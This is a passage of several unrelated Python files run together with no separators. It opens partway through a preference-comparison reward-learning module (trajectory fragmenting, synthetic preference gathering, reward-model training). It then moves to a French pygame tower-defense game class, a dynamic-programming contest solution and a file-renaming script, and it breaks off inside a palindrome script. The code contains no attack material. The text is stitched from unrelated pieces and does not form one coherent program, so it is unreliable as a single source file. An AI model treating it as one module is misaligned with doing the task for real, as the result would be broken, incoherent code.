f" Sampling {agent_steps - avail_steps} additional transitions.", ) sample_until = rollout.make_sample_until( min_timesteps=agent_steps - avail_steps, min_episodes=None, ) # Important note: we don't want to use the trajectories returned # here because 1) they might miss initial timesteps taken by the RL agent # and 2) their rewards are the ones provided by the reward model! # Instead, we collect the trajectories using the BufferingWrapper. rollout.generate_trajectories( self.algorithm, self.venv, sample_until=sample_until, ) additional_trajs, _ = self.buffering_wrapper.pop_finished_trajectories() agent_trajs = list(agent_trajs) + list(additional_trajs) agent_trajs = _get_trajectories(agent_trajs, agent_steps) exploration_trajs = [] if exploration_steps > 0: self.logger.log(f"Sampling {exploration_steps} exploratory transitions.") sample_until = rollout.make_sample_until( min_timesteps=exploration_steps, min_episodes=None, ) rollout.generate_trajectories( policy=self.exploration_wrapper, venv=self.venv, sample_until=sample_until, ) exploration_trajs, _ = self.buffering_wrapper.pop_finished_trajectories() exploration_trajs = _get_trajectories(exploration_trajs, exploration_steps) # We call _get_trajectories separately on agent_trajs and exploration_trajs # and then just concatenate. This could mean we return slightly too many # transitions, but it gets the proportion of exploratory and agent transitions # roughly right. return list(agent_trajs) + list(exploration_trajs) @TrajectoryGenerator.logger.setter def logger(self, value: imit_logger.HierarchicalLogger): self._logger = value self.algorithm.set_logger(self.logger) def _get_trajectories( trajectories: Sequence[TrajectoryWithRew], steps: int, ) -> Sequence[TrajectoryWithRew]: """Get enough trajectories to have at least `steps` transitions in total.""" if steps == 0: return [] available_steps = sum(len(traj) for traj in trajectories) if available_steps < steps: raise RuntimeError( f"Asked for {steps} transitions but only {available_steps} available", ) # We need the cumulative sum of trajectory lengths # to determine how many trajectories to return: steps_cumsum = np.cumsum([len(traj) for traj in trajectories]) # Now we find the first index that gives us enough # total steps: idx = (steps_cumsum >= steps).argmax() # we need to include the element at position idx trajectories = trajectories[: idx + 1] # sanity check assert sum(len(traj) for traj in trajectories) >= steps return trajectories class Fragmenter(abc.ABC): """Class for creating pairs of trajectory fragments from a set of trajectories.""" def __init__(self, custom_logger: Optional[imit_logger.HierarchicalLogger] = None): """Initialize the fragmenter. Args: custom_logger: Where to log to; if None (default), creates a new logger. """ self.logger = custom_logger or imit_logger.configure() @abc.abstractmethod def __call__( self, trajectories: Sequence[TrajectoryWithRew], fragment_length: int, num_pairs: int, ) -> Sequence[TrajectoryWithRewPair]: """Create fragment pairs out of a sequence of trajectories. Args: trajectories: collection of trajectories that will be split up into fragments fragment_length: the length of each sampled fragment num_pairs: the number of fragment pairs to sample Returns: a sequence of fragment pairs """ # noqa: DAR202 class RandomFragmenter(Fragmenter): """Sample fragments of trajectories uniformly at random with replacement. Note that each fragment is part of a single episode and has a fixed length. 
This leads to a bias: transitions at the beginning and at the end of episodes are less likely to occur as part of fragments (this affects the first and last fragment_length transitions). An additional bias is that trajectories shorter than the desired fragment length are never used. """ def __init__( self, seed: Optional[float] = None, warning_threshold: int = 10, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Initialize the fragmenter. Args: seed: an optional seed for the internal RNG warning_threshold: give a warning if the number of available transitions is less than this many times the number of required samples. Set to 0 to disable this warning. custom_logger: Where to log to; if None (default), creates a new logger. """ super().__init__(custom_logger) self.rng = random.Random(seed) self.warning_threshold = warning_threshold def __call__( self, trajectories: Sequence[TrajectoryWithRew], fragment_length: int, num_pairs: int, ) -> Sequence[TrajectoryWithRewPair]: fragments: List[TrajectoryWithRew] = [] prev_num_trajectories = len(trajectories) # filter out all trajectories that are too short trajectories = [traj for traj in trajectories if len(traj) >= fragment_length] if len(trajectories) == 0: raise ValueError( "No trajectories are long enough for the desired fragment length " f"of {fragment_length}.", ) num_discarded = prev_num_trajectories - len(trajectories) if num_discarded: self.logger.log( f"Discarded {num_discarded} out of {prev_num_trajectories} " "trajectories because they are shorter than the desired length " f"of {fragment_length}.", ) weights = [len(traj) for traj in trajectories] # number of transitions that will be contained in the fragments num_transitions = 2 * num_pairs * fragment_length if sum(weights) < num_transitions: self.logger.warn( "Fewer transitions available than needed for desired number " "of fragment pairs. Some transitions will appear multiple times.", ) elif ( self.warning_threshold and sum(weights) < self.warning_threshold * num_transitions ): # If the number of available transitions is not much larger # than the number of requires ones, we already give a warning. # But only if self.warning_threshold is non-zero. self.logger.warn( f"Samples will contain {num_transitions} transitions in total " f"and only {sum(weights)} are available. " f"Because we sample with replacement, a significant number " "of transitions are likely to appear multiple times.", ) # we need two fragments for each comparison for _ in range(2 * num_pairs): traj = self.rng.choices(trajectories, weights, k=1)[0] n = len(traj) start = self.rng.randint(0, n - fragment_length) end = start + fragment_length terminal = (end == n) and traj.terminal fragment = TrajectoryWithRew( obs=traj.obs[start : end + 1], acts=traj.acts[start:end], infos=traj.infos[start:end] if traj.infos is not None else None, rews=traj.rews[start:end], terminal=terminal, ) fragments.append(fragment) # fragments is currently a list of single fragments. We want to pair up # fragments to get a list of (fragment1, fragment2) tuples. To do so, # we create a single iterator of the list and zip it with itself: iterator = iter(fragments) return list(zip(iterator, iterator)) class PreferenceGatherer(abc.ABC): """Base class for gathering preference comparisons between trajectory fragments.""" def __init__( self, seed: Optional[int] = None, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Initializes the preference gatherer. 
Args: seed: seed for the internal RNG, if applicable custom_logger: Where to log to; if None (default), creates a new logger. """ # The random seed isn't used here, but it's useful to have this # as an argument nevertheless because that means we can always # pass in a seed in training scripts (without worrying about whether # the PreferenceGatherer we use needs one). del seed self.logger = custom_logger or imit_logger.configure() @abc.abstractmethod def __call__(self, fragment_pairs: Sequence[TrajectoryWithRewPair]) -> np.ndarray: """Gathers the probabilities that fragment 1 is preferred in `fragment_pairs`. Args: fragment_pairs: sequence of pairs of trajectory fragments Returns: A numpy array with shape (b, ), where b is the length of the input (i.e. batch size). Each item in the array is the probability that fragment 1 is preferred over fragment 2 for the corresponding pair of fragments. Note that for human feedback, these probabilities are simply 0 or 1 (or 0.5 in case of indifference), but synthetic models may yield other probabilities. """ # noqa: DAR202 class SyntheticGatherer(PreferenceGatherer): """Computes synthetic preferences using ground-truth environment rewards.""" def __init__( self, temperature: float = 1, discount_factor: float = 1, sample: bool = True, seed: Optional[int] = None, threshold: float = 50, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Initialize the synthetic preference gatherer. Args: temperature: the preferences are sampled from a softmax, this is the temperature used for sampling. temperature=0 leads to deterministic results (for equal rewards, 0.5 will be returned). discount_factor: discount factor that is used to compute how good a fragment is. Default is to use undiscounted sums of rewards (as in the DRLHP paper). sample: if True (default), the preferences are 0 or 1, sampled from a Bernoulli distribution (or 0.5 in the case of ties with zero temperature). If False, then the underlying Bernoulli probabilities are returned instead. seed: seed for the internal RNG (only used if temperature > 0 and sample) threshold: preferences are sampled from a softmax of returns. To avoid overflows, we clip differences in returns that are above this threshold (after multiplying with temperature). This threshold is therefore in logspace. The default value of 50 means that probabilities below 2e-22 are rounded up to 2e-22. custom_logger: Where to log to; if None (default), creates a new logger. """ super().__init__(custom_logger=custom_logger) self.temperature = temperature self.discount_factor = discount_factor self.sample = sample self.rng = np.random.default_rng(seed=seed) self.threshold = threshold def __call__(self, fragment_pairs: Sequence[TrajectoryWithRewPair]) -> np.ndarray: """Computes probability fragment 1 is preferred over fragment 2.""" returns1, returns2 = self._reward_sums(fragment_pairs) if self.temperature == 0: return (np.sign(returns1 - returns2) + 1) / 2 returns1 /= self.temperature returns2 /= self.temperature # clip the returns to avoid overflows in the softmax below returns_diff = np.clip(returns2 - returns1, -self.threshold, self.threshold) # Instead of computing exp(rews1) / (exp(rews1) + exp(rews2)) directly, # we divide enumerator and denominator by exp(rews1) to prevent overflows: model_probs = 1 / (1 + np.exp(returns_diff)) # Compute the mean binary entropy. This metric helps estimate # how good we can expect the performance of the learned reward # model to be at predicting preferences. 
entropy = -( special.xlogy(model_probs, model_probs) + special.xlogy(1 - model_probs, 1 - model_probs) ).mean() self.logger.record("entropy", entropy) if self.sample: return self.rng.binomial(n=1, p=model_probs).astype(np.float32) return model_probs def _reward_sums(self, fragment_pairs) -> Tuple[np.ndarray, np.ndarray]: rews1, rews2 = zip( *[ ( rollout.discounted_sum(f1.rews, self.discount_factor), rollout.discounted_sum(f2.rews, self.discount_factor), ) for f1, f2 in fragment_pairs ], ) return np.array(rews1, dtype=np.float32), np.array(rews2, dtype=np.float32) class PreferenceDataset(th.utils.data.Dataset): """A PyTorch Dataset for preference comparisons. Each item is a tuple consisting of two trajectory fragments and a probability that fragment 1 is preferred over fragment 2. This dataset is meant to be generated piece by piece during the training process, which is why data can be added via the .push() method. """ def __init__(self): """Builds an empty PreferenceDataset.""" self.fragments1: List[TrajectoryWithRew] = [] self.fragments2: List[TrajectoryWithRew] = [] self.preferences = np.array([]) def push( self, fragments: Sequence[TrajectoryWithRewPair], preferences: np.ndarray, ): """Add more samples to the dataset. Args: fragments: list of pairs of trajectory fragments to add preferences: corresponding preference probabilities (probability that fragment 1 is preferred over fragment 2) Raises: ValueError: `preferences` shape does not match `fragments` or has non-float32 dtype. """ fragments1, fragments2 = zip(*fragments) if preferences.shape != (len(fragments),): raise ValueError( f"Unexpected preferences shape {preferences.shape}, " f"expected {(len(fragments), )}", ) if preferences.dtype != np.float32: raise ValueError("preferences should have dtype float32") self.fragments1.extend(fragments1) self.fragments2.extend(fragments2) self.preferences = np.concatenate((self.preferences, preferences)) def __getitem__(self, i) -> Tuple[TrajectoryWithRewPair, float]: return (self.fragments1[i], self.fragments2[i]), self.preferences[i] def __len__(self) -> int: assert len(self.fragments1) == len(self.fragments2) == len(self.preferences) return len(self.fragments1) def save(self, path: AnyPath) -> None: with open(path, "wb") as file: pickle.dump(self, file) @staticmethod def load(path: AnyPath) -> "PreferenceDataset": with open(path, "rb") as file: return pickle.load(file) def preference_collate_fn( batch: Sequence[Tuple[TrajectoryWithRewPair, float]], ) -> Tuple[Sequence[TrajectoryWithRewPair], np.ndarray]: fragment_pairs, preferences = zip(*batch) return list(fragment_pairs), np.array(preferences) class RewardTrainer(abc.ABC): """Abstract base class for training reward models using preference comparisons. This class contains only the actual reward model training code, it is not responsible for gathering trajectories and preferences or for agent training (see PreferenceComparisons for that). """ def __init__( self, model: reward_nets.RewardNet, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Initialize the reward trainer. Args: model: the RewardNet instance to be trained custom_logger: Where to log to; if None (default), creates a new logger. """ self.model = model self.logger = custom_logger or imit_logger.configure() def train(self, dataset: PreferenceDataset, epoch_multiplier: float = 1.0): """Train the reward model on a batch of fragment pairs and preferences. Args: dataset: the dataset of preference comparisons to train on. 
epoch_multiplier: how much longer to train for than usual (measured relatively). """ with networks.training(self.model): self._train(dataset, epoch_multiplier) @abc.abstractmethod def _train(self, dataset: PreferenceDataset, epoch_multiplier: float): """Train the reward model; see ``train`` for details.""" class CrossEntropyRewardTrainer(RewardTrainer): """Train a reward model using a cross entropy loss.""" def __init__( self, model: reward_nets.RewardNet, noise_prob: float = 0.0, batch_size: int = 32, epochs: int = 1, lr: float = 1e-3, discount_factor: float = 1.0, threshold: float = 50, weight_decay: float = 0.0, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, ): """Initialize the reward model trainer. Args: model: the RewardNet instance to be trained noise_prob: assumed probability with which the preference is uniformly random (used for the model of preference generation that is used for the loss) batch_size: number of fragment pairs per batch epochs: number of epochs on each training iteration (can be adjusted on the fly by specifying an `epoch_multiplier` in `self.train()` if longer training is desired in specific cases). lr: the learning rate discount_factor: the model of preference generation uses a softmax of returns as the probability that a fragment is preferred. This is the discount factor used to calculate those returns. Default is 1, i.e. undiscounted sums of rewards (which is what the DRLHP paper uses). threshold: the preference model used to compute the loss contains a softmax of returns. To avoid overflows, we clip differences in returns that are above this threshold. This threshold is therefore in logspace. The default value of 50 means that probabilities below 2e-22 are rounded up to 2e-22. weight_decay: the weight decay factor for the reward model's weights to use with ``th.optim.AdamW``. This is similar to but not equivalent to L2 regularization, see https://arxiv.org/abs/1711.05101 custom_logger: Where to log to; if None (default), creates a new logger. """ super().__init__(model, custom_logger) self.noise_prob = noise_prob self.batch_size = batch_size self.epochs = epochs self.discount_factor = discount_factor self.threshold = threshold self.optim = th.optim.AdamW( self.model.parameters(), lr=lr, weight_decay=weight_decay, ) def _loss( self, fragment_pairs: Sequence[TrajectoryPair], preferences: np.ndarray, ) -> th.Tensor: """Computes the loss. Args: fragment_pairs: Batch consisting of pairs of trajectory fragments. preferences: The probability that the first fragment is preferred over the second. Typically 0, 1 or 0.5 (tie). Returns: The cross-entropy loss between the probability predicted by the reward model and the target probabilities in `preferences`. """ probs = th.empty(len(fragment_pairs), dtype=th.float32) for i, fragment in enumerate(fragment_pairs): frag1, frag2 = fragment trans1 = rollout.flatten_trajectories([frag1]) trans2 = rollout.flatten_trajectories([frag2]) rews1 = self._rewards(trans1) rews2 = self._rewards(trans2) probs[i] = self._probability(rews1, rews2) # TODO(ejnnr): Here and below, > 0.5 is problematic # because getting exactly 0.5 is actually somewhat # common in some environments (as long as sample=False or temperature=0). # In a sense that "only" creates class imbalance # but it's still misleading. 
predictions = (probs > 0.5).float() preferences_th = th.as_tensor(preferences, dtype=th.float32) ground_truth = (preferences_th > 0.5).float() accuracy = (predictions == ground_truth).float().mean() self.logger.record("accuracy", accuracy.item()) return th.nn.functional.binary_cross_entropy(probs, preferences_th) def _rewards(self, transitions: Transitions) -> th.Tensor: preprocessed = self.model.preprocess( state=transitions.obs, action=transitions.acts, next_state=transitions.next_obs, done=transitions.dones, ) return self.model(*preprocessed) def _probability(self, rews1: th.Tensor, rews2: th.Tensor) -> th.Tensor: """Computes the Boltzmann rational probability that the first trajectory is best. Args: rews1: A 1-dimensional array of rewards for the first trajectory fragment. rews2: A 1-dimensional array of rewards for the second trajectory fragment. Returns: The softmax of the difference between the (discounted) return of the first and second trajectory. """ assert rews1.ndim == rews2.ndim == 1 # First, we compute the difference of the returns of # the two fragments. We have a special case for a discount # factor of 1 to avoid unnecessary computation (especially # since this is the default setting). if self.discount_factor == 1: returns_diff = (rews2 - rews1).sum() else: discounts = self.discount_factor ** th.arange(len(rews1)) returns_diff = (discounts * (rews2 - rews1)).sum() # Clip to avoid overflows (which in particular may occur # in the backwards pass even if they do not in the forward pass). returns_diff = th.clip(returns_diff, -self.threshold, self.threshold) # We take the softmax of the returns. model_probability # is the first dimension of that softmax, representing the # probability that fragment 1 is preferred. model_probability = 1 / (1 + returns_diff.exp()) return self.noise_prob * 0.5 + (1 - self.noise_prob) * model_probability def _train(self, dataset: PreferenceDataset, epoch_multiplier: float = 1.0): """Trains for `epoch_multiplier * self.epochs` epochs over `dataset`.""" # TODO(ejnnr): This isn't specific to the loss function or probability model. # In general, it might be best to split the probability model, the loss and # the optimization procedure a bit more cleanly so that different versions # can be combined dataloader = th.utils.data.DataLoader( dataset, batch_size=self.batch_size, shuffle=True, collate_fn=preference_collate_fn, ) epochs = round(self.epochs * epoch_multiplier) for _ in range(epochs): for fragment_pairs, preferences in dataloader: self.optim.zero_grad() loss = self._loss(fragment_pairs, preferences) loss.backward() self.optim.step() self.logger.record("loss", loss.item()) class PreferenceComparisons(base.BaseImitationAlgorithm): """Main interface for reward learning using preference comparisons.""" def __init__( self, trajectory_generator: TrajectoryGenerator, reward_model: reward_nets.RewardNet, fragmenter: Optional[Fragmenter] = None, preference_gatherer: Optional[PreferenceGatherer] = None, reward_trainer: Optional[RewardTrainer] = None, comparisons_per_iteration: int = 50, fragment_length: int = 50, transition_oversampling: float = 10, initial_comparison_frac: float = 0.1, initial_epoch_multiplier: float = 200.0, custom_logger: Optional[imit_logger.HierarchicalLogger] = None, allow_variable_horizon: bool = False, seed: Optional[int] = None, ): """Initialize the preference comparison trainer. The loggers of all subcomponents are overridden with the logger used by this class. 
Args: trajectory_generator: generates trajectories while optionally training an RL agent on the learned reward function (can also be a sampler from a static dataset of trajectories though). reward_model: a RewardNet instance to be used for learning the reward fragmenter: takes in a set of trajectories and returns pairs of fragments for which preferences will be gathered. These fragments could be random, or they could be selected more deliberately (active learning). Default is a random fragmenter. preference_gatherer: how to get preferences between trajectory fragments. Default (and currently the only option) is to use synthetic preferences based on ground-truth rewards. Human preferences could be implemented here in the future. reward_trainer: trains the reward model based on pairs of fragments and associated preferences. Default is to use the preference model and loss function from DRLHP. comparisons_per_iteration: number of preferences to gather at once (before switching back to agent training). This doesn't impact the total number of comparisons that are gathered, only the frequency of switching between preference gathering and agent training. fragment_length: number of timesteps per fragment that is used to elicit preferences transition_oversampling: factor by which to oversample transitions before creating fragments. Since fragments are sampled with replacement, this is usually chosen > 1 to avoid having the same transition in too many fragments. initial_comparison_frac: fraction of the total_comparisons argument to train() that will be sampled before the rest of training begins (using a randomly initialized agent). This can be used to pretrain the reward model before the agent is trained on the learned reward, to help avoid irreversibly learning a bad policy from an untrained reward. Note that there will often be some additional pretraining comparisons since `comparisons_per_iteration` won't exactly divide the total number of comparisons. How many such comparisons there are depends discontinuously on `total_comparisons` and `comparisons_per_iteration`. initial_epoch_multiplier: before agent training begins, train the reward model for this many more epochs than usual (on fragments sampled from a random agent). custom_logger: Where to log to; if None (default), creates a new logger. allow_variable_horizon: If False (default), algorithm will raise an exception if it detects trajectories of different length during training. If True, overrides this safety check. WARNING: variable horizon episodes leak information about the reward via termination condition, and can seriously confound evaluation. Read https://imitation.readthedocs.io/en/latest/guide/variable_horizon.html before overriding this. seed: seed to use for initializing subcomponents such as fragmenter. Only used when default components are used; if you instantiate your own fragmenter, preference gatherer, etc., you are responsible for seeding them! """ super().__init__( custom_logger=custom_logger, allow_variable_horizon=allow_variable_horizon, ) # for keeping track of the global iteration, in case train() is called # multiple times self._iteration = 0 self.model = reward_model self.reward_trainer = reward_trainer or CrossEntropyRewardTrainer( reward_model, custom_logger=self.logger, ) # If the reward trainer was created in the previous line, we've already passed # the correct logger. But if the user created a RewardTrainer themselves and # didn't manually set a logger, it would be annoying if a separate one was used. 
self.reward_trainer.logger = self.logger # the reward_trainer's model should refer to the same object as our copy assert self.reward_trainer.model is self.model self.trajectory_generator = trajectory_generator self.trajectory_generator.logger = self.logger self.fragmenter = fragmenter or RandomFragmenter( custom_logger=self.logger, seed=seed, ) self.fragmenter.logger = self.logger self.preference_gatherer = preference_gatherer or SyntheticGatherer( custom_logger=self.logger, seed=seed, ) self.preference_gatherer.logger = self.logger self.comparisons_per_iteration = comparisons_per_iteration self.fragment_length = fragment_length self.transition_oversampling = transition_oversampling self.initial_comparison_frac = initial_comparison_frac self.initial_epoch_multiplier = initial_epoch_multiplier self.dataset = PreferenceDataset() def train( self, total_timesteps: int, total_comparisons: int, callback: Optional[Callable[[int], None]] = None, ) -> Mapping[str, Any]: """Train the reward model and the policy if applicable. Args: total_timesteps: number of environment interaction steps total_comparisons: number of preferences to gather in total callback: callback functions called at the end of each iteration Returns: A dictionary with final metrics such as loss and accuracy of the reward model. Raises: ValueError: `total_comparisons < self.comparisons_per_iteration`. """ initial_comparisons = int(total_comparisons * self.initial_comparison_frac) total_comparisons -= initial_comparisons iterations, extra_comparisons = divmod( total_comparisons, self.comparisons_per_iteration, ) if iterations == 0: raise ValueError( f"total_comparisons={total_comparisons} is less than " f"comparisons_per_iteration={self.comparisons_per_iteration}", ) timesteps_per_iteration, extra_timesteps = divmod(total_timesteps, iterations) reward_loss = None reward_accuracy = None for i in range(iterations): ########################## # Gather new preferences # ########################## num_pairs = self.comparisons_per_iteration # If the number of comparisons per iterations doesn't exactly divide # the desired total number of comparisons, we collect the remainder # right at the beginning to pretrain the reward model slightly. # WARNING: This means that slightly changing the total number of # comparisons or the number of comparisons per iteration can # significantly change the proportion of pretraining comparisons! # # In addition, we collect the comparisons specified via # initial_comparison_frac. if i == 0: num_pairs += extra_comparisons + initial_comparisons num_steps = math.ceil( self.transition_oversampling * 2 * num_pairs * self.fragment_length, ) self.logger.log(f"Collecting {num_steps} trajectory steps") trajectories = self.trajectory_generator.sample(num_steps) # This assumes there are no fragments missing initial timesteps # (but allows for fragments missing terminal timesteps). 
horizons = (len(traj) for traj in trajectories if traj.terminal) self._check_fixed_horizon(horizons) self.logger.log("Creating fragment pairs") fragments = self.fragmenter(trajectories, self.fragment_length, num_pairs) with self.logger.accumulate_means("preferences"): self.logger.log("gathering preferences") preferences = self.preference_gatherer(fragments) self.dataset.push(fragments, preferences) self.logger.log(f"Dataset now contains {len(self.dataset)} samples") ########################## # Train the reward model # ########################## # On the first iteration, we train the reward model for longer, # as specified by initial_epoch_multiplier. epoch_multiplier = 1.0 if i == 0: epoch_multiplier = self.initial_epoch_multiplier with self.logger.accumulate_means("reward"): self.logger.log("Training reward model") self.reward_trainer.train( self.dataset, epoch_multiplier=epoch_multiplier, ) reward_loss = self.logger.name_to_value["mean/reward/loss"] reward_accuracy = self.logger.name_to_value["mean/reward/accuracy"] ################### # Train the agent # ################### num_steps = timesteps_per_iteration # if the number of timesteps per iterations doesn't exactly divide # the desired total number of timesteps, we train the agent a bit longer # at the end of training (where the reward model is presumably best) if i == iterations - 1: num_steps += extra_timesteps with self.logger.accumulate_means("agent"): self.logger.log(f"Training agent for {num_steps} timesteps") self.trajectory_generator.train(steps=num_steps) self.logger.dump(self._iteration) ######################## # Additional Callbacks # ######################## if callback: callback(self._iteration) self._iteration += 1 return {"reward_loss": reward_loss, "reward_accuracy": reward_accuracy}
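# Hedged sketch (made-up numbers) of the comparison-scheduling arithmetic in
# PreferenceComparisons.train() above: the initial fraction is carved off first,
# the remainder is split across iterations, and both the leftover comparisons
# and the initial ones are folded into the first (pretraining) iteration.
total_comparisons = 1000
initial_comparison_frac = 0.1
comparisons_per_iteration = 70

initial_comparisons = int(total_comparisons * initial_comparison_frac)        # 100
remaining = total_comparisons - initial_comparisons                           # 900
iterations, extra_comparisons = divmod(remaining, comparisons_per_iteration)  # 12, 60
first_iteration_pairs = comparisons_per_iteration + extra_comparisons + initial_comparisons
print(iterations, first_iteration_pairs)   # 12 iterations; 230 pairs gathered before any agent training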
"""Module Partie""" import pygame import random from enums.Statut import Statut from enums.Menu import Menu from enums.Matiere import Matiere from enums.Filiere import Filiere from enums.EvenementsAleatoires import EvenementsAleatoires from Etudiant import Etudiant class Partie(): """Classe Partie : Gestion de la partie.""" def __init__(self, carte, affichage): """Constructeur classe Partie :param carte: Carte sur laquelle la partie se joue. :param affichage: Classe qui gere l'affichage de la partie actuelle.""" #Attributs self.carte = carte self.affichage = affichage self.etudiants = [] self.enseignants = [] self.statut = Statut.ENTRE_VAGUE self.timer = 5 self.vague = 0 self.dernier_seconde = pygame.time.get_ticks() self.file_attente_vague = [] self.dernier_apparition = 0 self.vie = 10 self.argent = 1000000 self.matiere_courante = Matiere.HISTOIRE self.evenement = EvenementsAleatoires.AUCUN def ajouter_etudiant(self, etudiant): """Procedure : Ajouter un etudiant dans la partie :param etudiant: Etudiant à ajouter.""" self.etudiants += [etudiant] def retirer_etudiant(self, etudiant): """Procedure : Retirer un etudiant de la partie :param etudiant: Etudiant à retirer.""" self.etudiants.remove(etudiant) del etudiant def ajouter_enseignant(self, enseignant): """Procedure : Ajouter un enseignant dans la partie :param enseignant: Enseignant à ajouter.""" self.enseignants += [enseignant] def retirer_enseignant(self, enseignant): """Procedure : Retirer un enseignant de la partie :param enseignant: Enseignant à retirer.""" self.enseignants.remove(enseignant) del enseignant def get_enseignant(self, coords): """Fonction qui retourne un enseignant aux coordonnées. :param coords: Coordonnées de l'enseignant recherché. :return: Enseignant.""" resultat = None for enseignant in self.enseignants: if enseignant.coords == coords: resultat = enseignant return resultat def get_affichage(self): """Fonction qui retourne l'affichage de la partie. :return: Affichage""" return self.affichage def rafraichir(self): """Procedure : Fait avancer le jeu (Temps entre-vague, faire avancer les etudiant, faire tirer les profs...)""" #Apparition des etudiants dans la vague if (len(self.file_attente_vague) > 0 and self.file_attente_vague[0][0] <= pygame.time.get_ticks()): mtn = pygame.time.get_ticks() # if mtn - self.dernier_apparition >= 500: #Delai entre les apparitions self.dernier_apparition = mtn # self.ajouter_etudiant(self.file_attente_vague[0][1]) self.file_attente_vague.pop(0) #Faire tirer les enseignants if len(self.enseignants) > 0: for enseignant in self.enseignants: enseignant.tirer() #Faire avancer les etudiants if len(self.etudiants) > 0: for etudiant in self.etudiants: etudiant.avancer() #Gestion transition vague car plus d'etudiants elif len(self.file_attente_vague) == 0: if self.statut == Statut.VAGUE: #Fin de vague self.statut = Statut.ENTRE_VAGUE self.timer = 5 self.argent += 25 + 10*(self.vague)**0.5 self.affichage.afficher_message("Fin de la vague.", 3) elif self.statut == Statut.ENTRE_VAGUE and self.timer > 0: mtn = pygame.time.get_ticks() # if mtn - self.dernier_seconde >= 1000: #Delai entre vague self.dernier_seconde = mtn # self.affichage.afficher_message("Nouvelle vague dans " + str(self.timer), 1) self.timer -= 1 elif self.statut == Statut.ENTRE_VAGUE and self.timer <= 0: self.statut = Statut.VAGUE self.vague += 1 #Choix evenements aléatoire msg_evenement = "" if self.vague % 7 == 5: self.evenement = EvenementsAleatoires.VENDREDI_MATIN msg_evenement = " - Vendredi matin ! 
Les etudiants sont affaiblis." elif self.vague % 18 == 0: self.evenement = EvenementsAleatoires.PARTIEL msg_evenement = " - Partiel ! Les etudiants sont entrainés." elif self.vague % 30 == 0: self.evenement = EvenementsAleatoires.RETOUR_VACANCES msg_evenement = " - Retour de vacances ! Les etudiants sont en forme et vont plus vite." self.affichage.afficher_message("Nouvelle vague ! (Vague " + str(self.vague) + ")" + msg_evenement, 3) effectifs = effectifs_vague(self.vague) for i in range(len(effectifs)-1, -1, -1): for j in range(0, effectifs[i]): etudiant = Etudiant(self.carte.chemin[0], self, i+1, random.choice(list(Filiere))) self.file_attente_vague += [(pygame.time.get_ticks() + 500*j, etudiant)] def perdre_vie(self): """Procedure qui fait perdre une vie au joueur et le notifie.""" if self.vie == 0: self.affichage.menu = Menu.PERDU self.affichage.afficher_message("Fin de la partie ! Vous n'avez plus de vies", 10) else: self.vie -= 1 self.affichage.afficher_message("Vous avez perdu une vie ! Il vous en reste " + str(self.vie), 3) def effectifs_vague(vague): """Fonction qui retourne le nombre d'etudiant a faire apparaitre dans la prochaine vague. :param vague: Entier : Numero de vague. :return: Tableau d'entiers : Nombre d'etudiants par type. """ resultat = [(vague * 3) % 15, (vague - 1) % 20, vague // 5] return resultat
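# Quick illustration (hedged) of effectifs_vague above: student counts per type
# index for a few wave numbers.
for vague in (1, 5, 10, 30):
    print(vague, effectifs_vague(vague))
# 1  -> [3, 0, 0]
# 5  -> [0, 4, 1]
# 10 -> [0, 9, 2]
# 30 -> [0, 9, 6]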
import sys

inf = sys.maxsize

N, K = map(int, input().split())
heights = list(map(int, input().split()))

dp = [inf] * N
dp[0] = 0


def chmin(a, b, diff):
    if dp[a] > dp[b] + diff:
        dp[a] = dp[b] + diff
    return


for i in range(N):
    for j in range(1, K + 1):
        if i - j >= 0:
            chmin(i, i - j, abs(heights[i] - heights[i - j]))

print(dp[N - 1])
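# Hedged standalone re-check of the recurrence above (no stdin needed): with
# heights 10 30 40 50 20 and K = 3 the minimum total cost is 30, via the jumps
# 0 -> 1 -> 4, i.e. |30 - 10| + |20 - 30| = 20 + 10.
def min_cost(heights, K):
    inf = float('inf')
    dp = [inf] * len(heights)
    dp[0] = 0
    for i in range(len(heights)):
        for j in range(1, K + 1):
            if i - j >= 0:
                dp[i] = min(dp[i], dp[i - j] + abs(heights[i] - heights[i - j]))
    return dp[-1]

print(min_cost([10, 30, 40, 50, 20], 3))   # expected: 30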
import os
import re

from visnav.settings import *

if False:
    for fn in os.listdir(CACHE_DIR):
        m = re.match(r'^(.*?)(hi|lo)(\d{4})\.nsm$', fn)
        nfn = None
        if m:
            nfn = m[1] + m[3] + '_' + m[2] + '.nsm'
        elif re.match(r'.*?\d\.nsm$', fn):
            nfn = fn[:-4] + '_lo.nsm'
        if nfn is not None:
            os.rename(os.path.join(CACHE_DIR, fn), os.path.join(CACHE_DIR, nfn))
elif False:
    # ^iteration_ => rose_
    # ^far => rose_far_
    # ^shapemodel_ => rose_
    for fn in os.listdir(CACHE_DIR):
        m = re.match(r'^(iteration_|shapemodel_|far)(.*?)$', fn)
        nfn = None
        if m:
            nfn = 'rose_' + ('far_' if m[1] == 'far' else '') + m[2]
        if nfn is not None:
            # print('%s => %s' % (fn, nfn))
            os.rename(os.path.join(CACHE_DIR, fn), os.path.join(CACHE_DIR, nfn))
else:
    # replace('F._P.', '_P.')
    for batch in ('mtp024', 'mtp025', 'mtp026'):
        path = os.path.join(DATA_DIR, 'rosetta-' + batch)
        for fn in os.listdir(path):
            m = re.match(r'.*?F\._P\.png$', fn)
            if m:
                nfn = fn.replace('F._P.', '_P.')
                os.rename(os.path.join(path, fn), os.path.join(path, nfn))
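# Hedged dry-run of the first rename rule above on hypothetical file names
# (the real cache contents are unknown):
import re

for fn in ('comet_hi0001.nsm', 'comet_lo0002.nsm', 'comet3.nsm'):
    m = re.match(r'^(.*?)(hi|lo)(\d{4})\.nsm$', fn)
    if m:
        print(fn, '->', m[1] + m[3] + '_' + m[2] + '.nsm')
    elif re.match(r'.*?\d\.nsm$', fn):
        print(fn, '->', fn[:-4] + '_lo.nsm')
# comet_hi0001.nsm -> comet_0001_hi.nsm
# comet_lo0002.nsm -> comet_0002_lo.nsm
# comet3.nsm       -> comet3_lo.nsm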
import sys

# For each input word, print every distinct palindromic substring of length > 1
# (in sorted order), followed by a blank line.
for word in sys.stdin:
    word = word.rstrip('\n')  # drop the trailing newline so it is not treated as a letter
    num_alph = {}
    alph_index = {}
    repeated = set()
    palindromes = set()
    reverse_word = ""
    for i in range(1, len(word) + 1):
        reverse_word += word[-i]
    # Count occurrences of each character.
    for letter in word:
        if letter not in num_alph:
            num_alph[letter] = 1
        else:
            num_alph[letter] += 1
